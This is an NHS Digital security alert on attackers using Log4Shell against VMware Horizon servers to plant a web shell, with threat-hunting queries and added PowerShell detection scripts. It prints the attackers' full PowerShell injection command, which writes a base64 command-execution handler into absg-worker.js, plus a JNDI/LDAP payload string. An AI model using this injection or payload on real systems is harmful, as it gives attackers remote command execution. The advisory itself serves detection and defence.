Log4Shell Vulnerabilities in VMware Horizon Targeted to Install Web Shells

Attackers are actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish web shells.

Report a cyber attack: call 0300 303 5222 or email carecert@nhsdigital.nhs.uk


Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks.

The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure.

Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.

The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.


NHS Digital response to Log4Shell

This alert is part of NHS Digital's wider response to the Log4Shell remote code execution vulnerability. For more information on Log4Shell itself, please visit our cyber alerts article Log4Shell RCE Vulnerability CC-3989.
 

Additional VMware systems may be vulnerable and affected organisations should regularly review the VMSA-2021-0028 security advisory: VMware Response to Apache Log4j Remote Code Execution Vulnerability. NHS and social care organisations are invited to use the Cyber Associates Network to find out additional information and participate in discussion about the Log4Shell remote code execution vulnerability and affected VMware products.


Attack details

The attack is very likely initiated via a Log4Shell payload similar to ${jndi:ldap://example.com}. The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon. This then launches the following PowerShell command, spawned from ws_TomcatService.exe:

Malicious PowerShell script

powershell -c "$path=gwmi win32_service|?{$_.Name -like """*VMBlastSG*"""}|%{$_.PathName -replace '"""', '' -replace """nssm.exe""","""lib\absg-worker.js"""};

The executed command invokes Get-WMIObject on win32_service and filters the result to services whose name contains 'VMBlastSG'. It takes the service's executable path, strips the surrounding quotes, replaces 'nssm.exe' with 'lib\absg-worker.js' and writes the result to $path, thereby identifying the location of the 'absg-worker.js' file for the targeted VMware Horizon instance.

$expr="""req.connection.end();
if(String(req.url).includes('REDACTED')) {try {replyError(req, res, 200, require('child_process').execSync(Buffer.from(req.headers['data'], 'base64').toString('ascii')`r`n`t`t`t`t`t).toString());
catch (err) {replyError(req, res, 400, err.stderr.toString());
return;""";

This writes a block of JavaScript to $expr. Once injected, it inspects every web request for a specific, hardcoded string in the URI and, when present, base64-decodes the 'data' request header and executes its contents as a command. The command output is returned to the attacker via 'replyError'; if execution fails, a standard error message is returned instead.

(Get-Content $path)|ForEach-Object {$_ -replace """req.connection.end()\;""", $expr}|Set-Content $path;Restart-Service -Force VMBlastSG"

This reads the file at the path stored in $path and, for each line, replaces any instance of "req.connection.end();" with the code block stored in $expr described above, thereby injecting the web shell into 'absg-worker.js'. The altered file then contains the original call to req.connection.end() followed by the injected command handler.

The 'VMBlastSG' service is then forcibly restarted so that the modified script is loaded and the listener becomes active.

Once established, the listener will execute arbitrary commands received in crafted web (HTTP / HTTPS) requests if a particular hardcoded string (key) is present in the URI of the request. The commands are stored as a header object (named 'data') in the crafted requests. This process is used to establish persistent communication with a command and control server that could then be used to carry out other malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.

A representative diagram of the attack is provided below:

Process diagram of malicious attack


Image description
  1. Log4Shell payload queries VMware Horizon server.
  2. Horizon server calls back over LDAP protocol and pulls malicious Java class.
  3. Malicious Java class executes PowerShell script, spawned from VMware Horizon's ws_TomcatService.exe.
  4. PowerShell script injects a web shell to absg-worker.js, and restarts VMBlastSG service.
  5. Listener created using Blast Secure Gateway for any IP address on port 8443.
  6. Stealthy persistence method established. Awaiting presence of specific key in attacker-invoked URI.

Threat Hunting Advice

Organisations should look for the following:

  • Evidence of ws_TomcatService.exe spawning abnormal processes
  • Any powershell.exe processes containing ‘VMBlastSG’ in the commandline
  • File modifications to ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ - this file is normally only overwritten during upgrades and is not otherwise modified

Any organisations that detect anomalous activity fitting the above patterns should contact CSOC via 0300 303 5222 or email carecert@nhsdigital.nhs.uk


PowerShell command to detect file modification

$path=gwmi win32_service|?{$_.Name -like "*VMBlastSG*"}|%{$_.PathName -replace "nssm.exe","lib\absg-worker.js"};gc $path.Replace("`"", "")|Select-String "req.headers\[\'data\'\]"
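The one-liner above only reports lines matching the 'data' header lookup. The following script is an added example, not part of the NHS Digital alert or a VMware tool: it locates absg-worker.js by the same service-path technique, checks it for several indicators taken from the injected code described above, and records the file's last write time and SHA256 so the result can be compared with the last Horizon upgrade. The indicator patterns, the -WorkerPath override and the output layout are this example's own choices.

```powershell
# Added example (not from the alert): hunt for the absg-worker.js web shell
# described in the alert. Indicator patterns and output shape are assumptions.
param(
    # Assumed parameter: override when Horizon is installed in a non-default location
    [string]$WorkerPath
)

# Indicators drawn from the injected $expr block in the alert
$indicators = @(
    "req\.headers\['data'\]",     # command carried in the 'data' request header
    'child_process',              # Node module used to run commands
    'execSync',                   # synchronous command execution
    "Buffer\.from\(.*'base64'"    # base64-decoded command text
)

function Get-BlastWorkerPath {
    # Same technique as the alert's one-liner: VMBlastSG runs under nssm.exe,
    # and absg-worker.js lives in lib\ beneath the same directory.
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name LIKE '%VMBlastSG%'"
    if (-not $svc) { return $null }
    $exe = ($svc | Select-Object -First 1).PathName -replace '"', ''
    return ($exe -replace 'nssm\.exe', 'lib\absg-worker.js')
}

function Test-BlastWorkerFile {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]@{ Path = $Path; Found = $false; Suspicious = $false; Hits = @(); LastWrite = $null; Sha256 = $null }
    }
    # Select-String accepts an array of regex patterns; one MatchInfo per matching line
    $hits = Select-String -LiteralPath $Path -Pattern $indicators |
        ForEach-Object { [pscustomobject]@{ Line = $_.LineNumber; Pattern = $_.Pattern; Text = $_.Line.Trim() } }
    $item = Get-Item -LiteralPath $Path
    [pscustomobject]@{
        Path       = $Path
        Found      = $true
        Suspicious = [bool]$hits
        Hits       = @($hits)
        LastWrite  = $item.LastWriteTimeUtc    # compare with the last Horizon upgrade date
        Sha256     = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
    }
}

if (-not $WorkerPath) { $WorkerPath = Get-BlastWorkerPath }
if (-not $WorkerPath) {
    Write-Warning 'VMBlastSG service not found; is this a Horizon Connection Server?'
    return
}
$result = Test-BlastWorkerFile -Path $WorkerPath
$result | Select-Object Path, Found, Suspicious, LastWrite, Sha256 | Format-List
$result.Hits | Format-Table -AutoSize
```

A clean absg-worker.js should produce no hits; any match, or a last write time that does not line up with a known upgrade, is worth escalating together with the hash so that it can be compared across servers.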

Microsoft Defender for Endpoint query to detect abnormal child processes spawned by ws_TomcatService.exe

DeviceProcessEvents
| where InitiatingProcessFileName =~ "ws_TomcatService.exe"
| where FileName != "repadmin.exe"

Microsoft Defender for Endpoint query to detect powershell.exe processes with 'VMBlastSG' in the command line

DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has "VMBlastSG"
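For Horizon servers that are not onboarded to Microsoft Defender for Endpoint, the same two process-based indicators can be hunted in the local Security event log. The script below is an added example, not part of the alert: it reads process creation events (event ID 4688) and flags children of ws_TomcatService.exe other than repadmin.exe, and powershell.exe processes with 'VMBlastSG' in the command line. It assumes that process creation auditing and command-line logging are enabled; the -Hours lookback and output layout are this example's own choices.

```powershell
# Added example (not from the alert): local-log equivalent of the two Defender
# for Endpoint queries in the alert, based on Security event 4688.
param([int]$Hours = 24)   # assumed parameter: lookback window

$filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }

function Get-Leaf([string]$p) {
    # File name only; tolerates the empty value seen when a field is not logged
    if ($p) { [System.IO.Path]::GetFileName($p) } else { '' }
}

Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
    # 4688 carries its fields in EventData/Data elements keyed by the Name attribute
    $x = [xml]$_.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    $parent = Get-Leaf $d['ParentProcessName']
    $child  = Get-Leaf $d['NewProcessName']
    $cmd    = [string]$d['CommandLine']

    $reasons = @()
    # Indicator 1: Tomcat spawning anything except the benign repadmin.exe noted in the alert
    if ($parent -ieq 'ws_TomcatService.exe' -and $child -ine 'repadmin.exe') {
        $reasons += 'child of ws_TomcatService.exe'
    }
    # Indicator 2: powershell.exe with VMBlastSG in its command line
    if ($child -ieq 'powershell.exe' -and $cmd -imatch 'VMBlastSG') {
        $reasons += 'VMBlastSG in PowerShell command line'
    }

    if ($reasons) {
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Parent      = $parent
            Process     = $child
            Reason      = ($reasons -join '; ')
            CommandLine = $cmd
        }
    }
} | Format-Table -AutoSize -Wrap
```

Run it as an administrator on each Connection Server; an empty table means no matching process creation was logged in the window, not that the host is clean, so pair it with the file check above.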

Remediation steps

Guidance: Affected organisations should review the VMware Horizon section of the VMware security advisory VMSA-2021-0028 and apply the relevant updates or mitigations immediately, or subsequently consult the NHS Digital High Severity Cyber Alert CC-3995.

Last edited: 24 January 2022 2:39 pm